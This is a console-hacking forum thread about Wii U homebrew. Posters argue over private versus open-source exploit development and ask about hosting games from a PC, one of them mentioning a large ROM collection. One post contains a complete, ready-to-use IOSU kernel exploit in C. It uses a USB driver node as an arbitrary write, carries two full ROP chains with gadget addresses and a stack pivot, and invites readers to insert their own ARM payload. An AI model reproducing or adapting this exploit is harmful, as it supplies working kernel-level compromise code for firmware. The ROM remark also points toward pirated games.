Hacking Wii U Hacking & Homebrew Discussion

[KiiWii]

I can't wait for the time to come and this exploit drops.

Keep up the great work @WulfyStylez and co.

 

[punderino]

That wait can actually be moved to the browser payload! Once I get a chance I might just look into integrating my stuff so I can PR it.
BTW, the new public iosu kernel code exec doesn't really mean much regarding our release plans/timeframe. Everything will still drop when it's done. I wouldn't personally spend too many hundreds of hours working on it tho since the work is already done! Of course it's not fair to say that while our stuff is still private and in development so... do whatever you want tbh.

Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help.

 

[shinyquagsire23]

Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help.

This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m

 

[punderino]

This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m

Yeah, I remember that lol. Have you let others who you know are knowledgeable on this stuff work with you? Or is it the same small team as before?

 

[NWPlayer123]

Yeah, 5.5.1 has always been 100% for me but it depends on the Wii U and I'm not sure what factors, it depends on the server and internet I guess, some use mine (nwplayer123.github.io/WiiU/) just fine, others have to use a different site to deliver, basically it has to get the entire MP4 payload downloaded before it starts executing, just try a different site or host yourself cause that'll have the lowest delay.

 

[WulfyStylez]

Can't you put the source up public so that others can work on it and speed up the process? People are gonna work on this other stuff regardless, it'd be a big help.

I'm talking about a separate early project here. We were at this point in around april of this year I think, so a serious amount of work beyond this has already been put in.

 

[iAqua]

Here's IOSU kernel code execution (using the IOS_CreateThread vector which is described on wiiubrew):

//Main.c
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <malloc.h>
#include <unistd.h>
#include "dynamic_libs/os_functions.h"
#include "dynamic_libs/fs_functions.h"
#include "dynamic_libs/gx2_functions.h"
#include "dynamic_libs/sys_functions.h"
#include "dynamic_libs/vpad_functions.h"
#include "dynamic_libs/padscore_functions.h"
#include "dynamic_libs/socket_functions.h"
#include "dynamic_libs/ax_functions.h"
#include "fs/fs_utils.h"
#include "fs/sd_fat_devoptab.h"
#include "system/memory.h"
#include "utils/logger.h"
#include "utils/utils.h"
#include "common/common.h"
#include "main.h"

int dev_uhs_0_handle;

/* YOUR ARM CODE HERE (starts at 0x08122500) */
int execute_me[] = {
    0xE3A00000,       // MOV R0, #0
    0xE12FFF1E,       // BX LR
};

#define CHAIN_START         0x1016AD40
#define SHUTDOWN         0x1012EE4C
#define SIMPLE_RETURN      0x101014E4
#define SOURCE            (0x120000)
#define IOS_CREATETHREAD   0x1012EABC

/* ROP CHAIN STARTS HERE (0x1015BD78) */
int final_chain[] = {
    0x101236f3,        // 0x00     POP {R1-R7,PC}
    0x0,               // 0x04     arg
    0x0812974C,        // 0x08     stackptr     CMP R3, #1; STREQ R1, [R12]; BX LR
    0x68,              // 0x0C     stacksize
    0x10101638,        // 0x10
    0x0,               // 0x14
    0x0,               // 0x18
    0x0,               // 0x1C
    0x1010388C,        // 0x20     CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,               // 0x24
    0x0,               // 0x28
    0x1012CFEC,        // 0x2C     MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x30
    0x0,               // 0x34
    IOS_CREATETHREAD,  // 0x38
    0x1,               // 0x3C
    0x2,               // 0x40
    0x10123a9f,        // 0x44     POP {R0,R1,R4,PC}
    0x0812A314,        // 0x48     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xEE030F10,        // 0x4C     value: MCR    P15, #0, R0, C3, C0, #0 (set dacr to R0)
    0x0,               // 0x50
    0x10123a8b,        // 0x54     POP {R3,R4,PC}
    0x1,               // 0x58     R3 must be 1 for the arbitrary write
    0x0,               // 0x5C
    0x1010CD18,        // 0x60     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x64
    0x0,               // 0x68
    0x1012EE64,        // 0x6C     set_panic_behavior (arbitrary write)
    0x0,               // 0x70
    0x0,               // 0x74
    0x10123a9f,        // 0x78     POP {R0,R1,R4,PC}
    0x0812A314 + 0x4,  // 0x7C     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE1A0D001,        // 0x80     value: MOV SP, R1
    0x0,               // 0x84
    0x10123a8b,        // 0x88     POP {R3,R4,PC}
    0x1,               // 0x8C     R3 must be 1 for the arbitrary write
    0x0,               // 0x90
    0x1010CD18,        // 0x94     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0x98
    0x0,               // 0x9C
    0x1012EE64,        // 0xA0     set_panic_behavior (arbitrary write)
    0x0,               // 0xA4
    0x0,               // 0xA8
    0x10123a9f,        // 0xAC     POP {R0,R1,R4,PC}
    0x0812A314 + 0x8,  // 0xB0     address: the beginning of syscall_0x1a (IOS_GetUpTime64)
    0xE8BD800F,        // 0xB4     value: LDMFD SP!, {R0-R3,PC}
    0x0,               // 0xB8
    0x10123a8b,        // 0xBC     POP {R3,R4,PC}
    0x1,               // 0xC0     R3 must be 1 for the arbitrary write
    0x0,               // 0xC4
    0x1010CD18,        // 0xC8     MOV R12, R0; MOV R0, R12; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,               // 0xCC
    0x0,               // 0xD0
    0x1012EE64,        // 0xD4     set_panic_behavior (arbitrary write)
    0x0,               // 0xD8
    0x0,               // 0xDC
    0x10123a9f,        // 0xE0     POP {R0,R1,R4,PC}
    0xFFFFFFFF,        // 0xE4     enable read/write everywhere
    0x1015BD78 + 0xF4, // 0xE8     location of privileged stack
    0x0,               // 0xEC
    0x1012EB8C,        // 0xF0     IOS_GetUpTime64 (privileged stack pivot) (ends in LDMFD SP!, {R0-R3,PC})
    0x08122500,        // 0xF4     destination
    0x00140000,        // 0xF8     source
    sizeof(execute_me),// 0xFC     length
    0x0,               // 0x100
    0x08131AE4,        // 0x104    BL KERNEL_MEMCPY; MOV R0, R4; ADD SP, SP, #8; LDMFD SP!, {R4-R8,PC}
    0x0,               // 0x108
    0x0,               // 0x10C
    0xFFFFDC48,        // 0x110    Will be the LR: shutdown syscall
    0x0,               // 0x114
    0x0,               // 0x118
    0x0,               // 0x11C
    0x0,               // 0x120
    0x0812A124,        // 0x124    MOV LR, R4; MOV R0, LR; LDMFD SP!, {R4,PC}
    0x0,               // 0x128 
    0x08122500,        // 0x12C    Jump to code!
};

int second_chain[] = {
    0x10123a9f, // 0x00         POP {R0,R1,R4,PC}
    CHAIN_START + 0x14 + 0x4 + 0x20 - 0xF000,     // 0x04         destination
    0x0,        // 0x08     
    0x0,        // 0x0C     
    0x101063db, // 0x10         POP {R1,R2,R5,PC}
    0x00130000, // 0x14         source
    sizeof(final_chain),          // 0x18         length
    0x0,        // 0x1C     
    0x10106D4C, // 0x20         BL MEMCPY; MOV R0, #0; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x24     
    0x0,        // 0x28     
    0x101236f3, // 0x2C         POP {R1-R7,PC}
    0x0,        // 0x30         arg
    0x101001DC, // 0x34         stackptr
    0x68,       // 0x38         stacksize
    0x10101634, // 0x3C         proc: ADD SP, SP, #8; LDMFD SP!, {R4,R5,PC}
    0x0,        // 0x40
    0x0,        // 0x44
    0x0,        // 0x48
    0x1010388C, // 0x4C         CMP R3, #0; MOV R0, R4; LDMNEFD SP!, {R4,R5,PC}
    0x0,        // 0x50
    0x0,        // 0x54
    0x1012CFEC, // 0x58         MOV LR, R0; MOV R0, LR; ADD SP, SP, #8; LDMFD SP!, {PC}
    0x0,        // 0x5C
    0x0,        // 0x60
    IOS_CREATETHREAD, // 0x64
    0x1,        // 0x68         priority
    0x2,        // 0x6C         flags
    0x0,        // 0x70
    0x0,        // 0x74
    0x101063db, // 0x78         POP {R1,R2,R5,PC}
    0x0,        // 0x7C     
    -(0x240 + 0xF000), // 0x80  stack offset
    0x0,        // 0x84     
    0x1011D424, // 0x88         LDMFD SP!, {R4-R11,PC}
    0x0,        // 0x8C     
    0x0,        // 0x90     
    0x0,        // 0x94     
    0x0,        // 0x98     
    0x0,        // 0x9C     
    0x0,        // 0xA0     
    0x0,        // 0xA4     
    0x4,        // 0xA8         R11 must equal 4 in order to pivot the stack
    0x1012EA68, // 0xAC         stack pivot
};

int Menu_Main(void) {
    //!---------INIT---------
    InitOSFunctionPointers();                  //! Init coreinit functions adresses
    dev_uhs_0_handle = IOS_Open("/dev/uhs/0", 0);   //! Open /dev/uhs/0 IOS node
    uhs_exploit_init();                        //! Init variables for the exploit

                                              //!------ROP CHAIN-------
    uhs_write32(CHAIN_START + 0x14, CHAIN_START + 0x14 + 0x4 + 0x20);
    uhs_write32(CHAIN_START + 0x10, 0x1011814C);
    uhs_write32(CHAIN_START + 0xC, SOURCE);

    uhs_write32(CHAIN_START, 0x1012392b); // pop {R4-R6,PC}

                                         //!--------DEINIT--------
    IOS_Close(dev_uhs_0_handle);               //! Close /dev/uhs/0 IOS node
    return EXIT_SUCCESS;                     //! Exit from HBL
}

//!------Variables used in exploit------
int *pretend_root_hub = (int*)0xF5003ABC;
int *ayylmao = (int*)0xF4500000;
//!-------------------------------------

void uhs_exploit_init() {
    ayylmao[5] = 1;
    ayylmao[8] = 0x500000;

    memcpy((char*)(0xF4120000), second_chain, sizeof(second_chain));
    memcpy((char*)(0xF4130000), final_chain, sizeof(final_chain));
    memcpy((char*)(0xF4140000), execute_me, sizeof(execute_me));

    pretend_root_hub[33] = 0x500000;
    pretend_root_hub[78] = 0;

    DCFlushRange(pretend_root_hub + 33, 200);      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange(pretend_root_hub + 33, 200);   //! |for "pretend_root_hub"

    DCFlushRange((void*)0xF4120000, sizeof(second_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4120000, sizeof(second_chain));   //! |for second chain inside MEM1
    DCFlushRange((void*)0xF4130000, sizeof(final_chain));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4130000, sizeof(final_chain));   //! |for final chain inside MEM1
    DCFlushRange((void*)0xF4140000, sizeof(execute_me));      //! |Make CPU fetch new data (with updated vals)
    DCInvalidateRange((void*)0xF4140000, sizeof(execute_me));   //! |for final chain inside MEM1
}

int uhs_write32(int arm_addr, int val) {
    ayylmao[520] = arm_addr - 24;                  //!  The address to be overwritten, minus 24 bytes
    DCFlushRange(ayylmao, 521 * 4);                //! |Make CPU fetch new data (with updated adress)
    DCInvalidateRange(ayylmao, 521 * 4);           //! |for "ayylmao"
    OSSleepTicks(0x200000);                        //!  Improves stability
    int request_buffer[] = { -(0xBEA2C), val };      //! -(0xBEA2C) gets IOS_USB to read from the middle of MEM1
    int output_buffer[32];
    return IOS_Ioctl(dev_uhs_0_handle, 0x15, request_buffer, sizeof(request_buffer), output_buffer, sizeof(output_buffer));
}

Put your code into execute_me and it'll execute. You have about 0x5D0 bytes of space. The above code will simply shut your console down as a demonstration.

Here it is... IOSU's dead.

 

[fatsquirrel]

Here it is... IOSU's dead.

Yeah we heard you say it mate. now chill your shit

 

[iAqua]

Yeah we heard you say it mate. now chill your shit

Why chill? I'm excited .

 

[wiiman.au]

Just an idea (not sure if it would work though) ok so we currently use a web hack from our PC's to exploit the Wii U, is it possible to host our game collection on our PC and run them from the PC via ethernet rather than using a SD Card, I know you can buy a usb ethernet adaptor for the Wii U to improve speed, could this idea work ???

 

[Deleted User]

Just an idea (not sure if it would work though) ok so we currently use a web hack from our PC's to exploit the Wii U, is it possible to host our game collection on our PC and run them from the PC via ethernet rather than using a SD Card, I know you can buy a usb ethernet adaptor for the Wii U to improve speed, could this idea work ???

As far as I know, normal retail Wii Us don't have ethernet ports; I just checked on my own Wii U and it doesn't have one. Only kiosk units and dev units have it, I think...

 

[I pwned U!]

As far as I know, normal retail Wii Us don't have ethernet ports; I just checked on my own Wii U and it doesn't have one. Only kiosk units and dev units have it, I think...

wiiman.au is referring to this accessory.

 

[Deleted User]

wiiman.au is referring to this accessory.

Ah, I apologise; I've never seen one of those before..

 

[wiiman.au]

Ah, I apologise; I've never seen one of those before..

neither had I until I came across it on google and thought what if, it could save a lot of time and effort waiting for IOSU if we could stream the game across ethernet from a PC, wild thought but it could work ?

 

[PagaN]

IOSU never exists.

 

[VinsCool]

IOSU never exists.

It exists though.

 

[AboodXD]

It doesn't, IOS does!

Enough with the jokes...

 

[moops44]

neither had I until I came across it on google and thought what if, it could save a lot of time and effort waiting for IOSU if we could stream the game across ethernet from a PC, wild thought but it could work ?

afaik they tested the speed between sdcard and ethernet, and there was no really differenc

 

[wiiman.au]

afaik they tested the speed between sdcard and Ethernet, and there was no really difference

I'm not referring to speed although i thought via Ethernet would be a bit quicker than SD but anyway moving on from that , what I am referring to is been able to run our collections from a PC rather than forking out big $$$ for a SD card, my collection is already over 250gigs worth of roms so with that you can understand what i mean, now I'm no server expert but if you can run a exploit from your PC why is it not possible to execute roms from there as well ??

 

[wiiman.au]

This would be under the assumption that things don't get forked by 20 different people with slightly different tweaks in each branch that never make it back to the original project. Memchunkhax2 was a mess with 3DS because there were at least 3 different tools trying to do the same thing rather than one unified effort. Sometimes a private unified effort can be more efficient and effective than a public maybe-unified maybe-not project. Some might argue that forking is better because it gives people more choice, but most of the time it just ends up being confusing and pointless because people like to randomly strip features in the name of m i n i m a l i s m

I tend to agree to disagree on that, open source would improve the code and get more people involved in development, a perfect example is the emulation scene just look at the likes of retroarch, PCSX2, dolphin etc.. if it was closed source the code wouldn't get improved and games woudn't run etc.. open source is the way forward, understandably your crew wants the credit for the hack and I get that, but at least let others get involved in the development to make this happen